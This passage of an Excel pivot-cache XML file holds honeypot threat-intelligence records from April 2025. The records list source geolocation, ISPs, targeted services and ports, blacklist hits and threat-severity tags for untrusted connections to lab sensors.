    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="9650&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:eea2"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1977"/>
    <x v="1977"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T16:37:29"/>
    <d v="2025-04-13T16:37:29"/>
    <d v="2025-04-13T16:37:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="AH"/>
    <s v="Al Aḩmadī"/>
    <s v="NA"/>
    <s v="Ar Riqqah"/>
    <s v="285728"/>
    <s v="NA"/>
    <s v="29.1458"/>
    <s v="48.0947"/>
    <s v="42961"/>
    <s v="GPRS-AS"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="consumer"/>
    <s v="Zain Mobile Connectivity Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2525:b559"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1978"/>
    <x v="1978"/>
    <s v="NA&amp;&amp;static-ip-109-164-66-202.rev.dyxnet.com"/>
    <x v="0"/>
    <d v="2025-04-13T15:58:50"/>
    <d v="2025-04-13T15:54:05"/>
    <d v="2025-04-13T15:58:50"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South Delhi"/>
    <s v="Aya Nagar"/>
    <s v="13157005"/>
    <s v="NA"/>
    <s v="28.472"/>
    <s v="77.1327"/>
    <s v="134337"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="business"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-01-04 12:55:40"/>
    <s v="2030-01-04 12:55:40"/>
    <s v="2024-11-19 08:01:47"/>
    <s v="['NS1.DIYIXIAN.COM', 'NS2.DIYIXIAN.COM']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ca42:a46d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1979"/>
    <x v="1979"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T15:49:33"/>
    <d v="2025-04-13T15:49:03"/>
    <d v="2025-04-13T15:49:33"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="26"/>
    <s v="Ivano-Frankivsk"/>
    <s v="Ivano-Frankivsk Raion"/>
    <s v="Ivano-Frankivsk"/>
    <s v="707471"/>
    <s v="NA"/>
    <s v="48.9231"/>
    <s v="24.7125"/>
    <s v="47702"/>
    <s v="Teleradiocompany Discovery Ltd."/>
    <s v="Teleradiocompany Discovery Ltd"/>
    <s v="cellular"/>
    <s v="Discovery LLC"/>
    <s v="2009-10-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d56d:e985"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1980"/>
    <x v="1980"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T15:29:03"/>
    <d v="2025-04-13T15:29:03"/>
    <d v="2025-04-13T15:29:03"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:9f1c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1981"/>
    <x v="1981"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T15:27:49"/>
    <d v="2025-04-13T15:27:49"/>
    <d v="2025-04-13T15:27:49"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:ab2f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1982"/>
    <x v="1982"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T15:25:42"/>
    <d v="2025-04-13T15:25:42"/>
    <d v="2025-04-13T15:25:42"/>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2:3673"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1983"/>
    <x v="1983"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T15:16:56"/>
    <d v="2023-08-04T11:52:00"/>
    <d v="2025-04-13T15:16:56"/>
    <n v="1308"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SOCKS5_H43&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;5900&amp;&amp;1080&amp;&amp;9100&amp;&amp;445&amp;&amp;80&amp;&amp;38486&amp;&amp;1433&amp;&amp;52527&amp;&amp;53046"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="GE"/>
    <s v="Georgia"/>
    <s v="TB"/>
    <s v="T'bilisi"/>
    <s v="NA"/>
    <s v="Tbilisi (Vake-Saburtalo)"/>
    <s v="611717"/>
    <s v="NA"/>
    <s v="41.7235"/>
    <s v="44.7403"/>
    <s v="16010"/>
    <s v="Magticom Ltd."/>
    <s v="Corporate"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2005-09-05"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,59613)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,61097)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,61688)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,52497)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,52772)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,62114)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,62406)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,54968)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,55828)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,57780)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,58414)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,55432)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,52527)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,50356)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,51028)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,53198)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,53624)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,64891)}&amp;&amp;{Data_SMB:Incoming connection (80.241.240.142,65463)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:50f1:f08e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1984"/>
    <x v="1984"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T15:13:32"/>
    <d v="2025-04-13T15:13:32"/>
    <d v="2025-04-13T15:13:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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3b61:f7a1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1985"/>
    <x v="1985"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T15:13:05"/>
    <d v="2025-04-13T15:13:05"/>
    <d v="2025-04-13T15:13:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:99e6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1986"/>
    <x v="1986"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T15:09:04"/>
    <d v="2025-04-13T15:09:04"/>
    <d v="2025-04-13T15:09:04"/>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7:c7f6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1987"/>
    <x v="1987"/>
    <s v="220-141-206-143.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-13T15:07:22"/>
    <d v="2025-04-13T15:07:22"/>
    <d v="2025-04-13T15:07:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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dc8d:ce8f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1988"/>
    <x v="1988"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T15:04:55"/>
    <d v="2025-04-13T15:04:55"/>
    <d v="2025-04-13T15:04:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:f00f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1989"/>
    <x v="1989"/>
    <s v="NA&amp;&amp;node-13l3.pool-101-109.dynamic.totinternet.net"/>
    <x v="0"/>
    <d v="2025-04-13T14:51:01"/>
    <d v="2025-04-13T09:29:13"/>
    <d v="2025-04-13T14:51:01"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Pathum Wan"/>
    <s v="Pathum Wan"/>
    <s v="7026842"/>
    <s v="10330"/>
    <s v="13.7365"/>
    <s v="100.524"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="business"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2019-05-14 09:00:25"/>
    <s v="2026-05-14 09:00:25"/>
    <s v="2023-05-18 14:44:23"/>
    <s v="['CORA.NS.CLOUDFLARE.COM', 'PHIL.NS.CLOUDFLARE.COM']"/>
    <s v="GMO Internet Group, Inc. d/b/a Onamae.com"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="30"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:656d:c867"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1990"/>
    <x v="1990"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:43:28"/>
    <d v="2025-04-13T14:41:41"/>
    <d v="2025-04-13T14:43:28"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-Business"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75df:1cdd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1991"/>
    <x v="1991"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:38:21"/>
    <d v="2025-04-13T14:38:21"/>
    <d v="2025-04-13T14:38:21"/>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3:1813"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1992"/>
    <x v="1992"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:30:14"/>
    <d v="2025-04-13T14:29:48"/>
    <d v="2025-04-13T14:30:14"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="['anonymous-proxy']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="True"/>
    <s v="vpn"/>
    <s v="medium"/>
    <s v="['anonymous-proxy']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="SCT"/>
    <s v="Scotland"/>
    <s v="South Lanarkshire"/>
    <s v="Symington"/>
    <s v="2636349"/>
    <s v="NA"/>
    <s v="55.5984"/>
    <s v="-3.5951"/>
    <s v="203020"/>
    <s v="HostRoyale Technologies Pvt Ltd"/>
    <s v="HostRoyale Technologies Pvt Ltd"/>
    <s v="hosting"/>
    <s v="Hostroyale"/>
    <s v="2017-05-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9c9:bc10"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1993"/>
    <x v="1993"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:23:53"/>
    <d v="2025-04-13T14:23:53"/>
    <d v="2025-04-13T14:23:53"/>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3:c6e5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1994"/>
    <x v="1994"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:22:58"/>
    <d v="2025-04-13T14:22:58"/>
    <d v="2025-04-13T14:22:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b06:f6d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1995"/>
    <x v="1995"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:16:25"/>
    <d v="2025-04-12T20:07:14"/>
    <d v="2025-04-13T14:16:25"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:a1e9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1996"/>
    <x v="1996"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:14:57"/>
    <d v="2025-04-13T14:14:57"/>
    <d v="2025-04-13T14:14:57"/>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3b5d:700"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1997"/>
    <x v="1997"/>
    <s v="p689006-ipxg00c01wakayama.wakayama.ocn.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:11:44"/>
    <d v="2025-03-31T01:51:06"/>
    <d v="2025-04-13T14:11:44"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_PJL_HC1"/>
    <s v="23&amp;&amp;9100&amp;&amp;1734&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
